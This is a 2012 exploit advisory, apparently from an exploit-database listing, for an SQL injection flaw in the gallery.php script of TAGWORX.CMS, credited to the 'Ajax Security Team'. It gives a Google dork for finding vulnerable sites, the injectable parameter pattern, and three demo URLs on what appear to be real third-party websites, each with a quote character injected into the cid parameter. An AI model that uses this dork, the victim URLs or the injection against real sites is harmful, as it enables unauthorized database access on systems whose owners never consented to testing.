TAGWORX.CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
ca2b1eabe92ac4268f6baedef3a63811adf6cc82bd7a4d632b168035398138d0
<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
M3Mb3R OF AjaxTm
-->
############################################################################
# Exploit Title: TAGWORX.CMS CMS (gallery.php) sql injection
# Google Dork: "Powered by <TAGWORX.CMS />"
# Date: 9/7/2012
# Author: Ajax Security Team
# Discovered By: Crim3R
# Home: WwW.AjaxTm.CoM
# Vendor Software: http://www.jajitech.net/
# Version: All Version
# Category:: webapps
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
==================================
sqli
[+] gallery.php?cid=[id][sqli]&pid=[id]
D3m0:
http://www.dr-schratzlseer.de/gallery.php?cid=124'&pid=124
http://www.weingut-muenchen.de/gallery.php?cat_id=17&cid='&pid=&img=1
http://www.lebenstanz.com/gallery.php?cid=124'&pid=124
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369